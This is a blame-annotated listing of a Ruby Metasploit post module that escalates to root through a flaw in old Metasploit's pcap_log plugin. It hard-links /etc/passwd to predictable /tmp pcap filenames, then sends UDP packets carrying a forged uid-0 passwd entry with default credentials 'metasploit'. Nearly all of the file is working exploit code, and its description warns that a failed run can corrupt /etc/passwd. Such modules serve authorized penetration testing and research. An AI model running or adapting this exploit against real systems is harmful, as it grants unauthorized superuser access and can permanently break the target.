2012-07-21 11:18:43 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-07-21 11:18:43 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core/exploit/local/linux'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ManualRanking
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2013-09-05 18:41:25 +00:00
|
|
|
include Msf::Post::File
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Local::Linux
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2013-09-04 17:32:53 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info, {
|
|
|
|
'Name' => 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
|
|
|
|
creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
|
|
|
|
filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within.
|
|
|
|
This, and all the other packets, are appended to /etc/passwd.
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
Successful exploitation results in the creation of a new superuser account.
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
|
|
|
|
files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
|
|
|
|
a permanent DoS on the target by corrupting the /etc/passwd file.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
|
2013-09-24 17:33:31 +00:00
|
|
|
'Platform' => %w{ bsd linux unix },
|
2013-08-30 21:28:54 +00:00
|
|
|
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'BID', '54472' ],
|
|
|
|
[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
|
|
|
|
[ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => "Jul 16 2012",
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Linux/Unix Universal', {} ],
|
|
|
|
],
|
|
|
|
'Stance' => Msf::Exploit::Stance::Passive,
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
}
|
|
|
|
))
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(2940),
|
|
|
|
OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
|
|
|
|
OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]),
|
|
|
|
OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5])
|
|
|
|
], self)
|
|
|
|
end
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def normalize_minutes
|
|
|
|
datastore["MINUTES"].abs rescue 0
|
|
|
|
end
|
2012-10-17 22:30:30 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
print_status "Setting up the victim's /tmp dir"
|
2016-09-28 22:15:01 +00:00
|
|
|
initial_size = read_file("/etc/passwd").lines.count
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status "/etc/passwd is currently #{initial_size} lines long"
|
|
|
|
i = 0
|
|
|
|
j = 0
|
|
|
|
loop do
|
|
|
|
if (i == 0)
|
|
|
|
j += 1
|
|
|
|
break if j >= datastore['MINUTES'] + 1 # Give up after X minutes
|
|
|
|
# 0a2940: cmd_exec is slow, so send 1 command to do all the links
|
|
|
|
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
|
|
|
|
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
|
|
|
|
end
|
2016-09-28 22:15:01 +00:00
|
|
|
current_size = read_file("/etc/passwd").lines.count
|
2013-08-30 21:28:54 +00:00
|
|
|
if current_size == initial_size
|
|
|
|
# PCAP is flowing
|
|
|
|
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
|
|
|
|
vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
|
|
|
|
udpsock = Rex::Socket::Udp.create(
|
|
|
|
{
|
|
|
|
'Context' => {'Msf' => framework, 'MsfExploit'=>self}
|
|
|
|
})
|
|
|
|
res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
|
|
|
|
else
|
|
|
|
break
|
|
|
|
end
|
|
|
|
sleep(1) # wait a second
|
|
|
|
i = (i+1) % 60 # increment second counter
|
|
|
|
end
|
2012-07-21 11:18:43 +00:00
|
|
|
|
2016-09-28 22:15:01 +00:00
|
|
|
if read_file("/etc/passwd").includes?("Metasploit")
|
2013-08-30 21:28:54 +00:00
|
|
|
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
|
|
|
|
# TODO: Consider recording our now-created username and password as a valid credential here.
|
|
|
|
else
|
|
|
|
print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
|
|
|
|
end
|
|
|
|
# 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
|
|
|
|
# However beceause the session is not a terminal, su will not always allow this.
|
|
|
|
end
|
2012-10-17 22:30:30 +00:00
|
|
|
end
|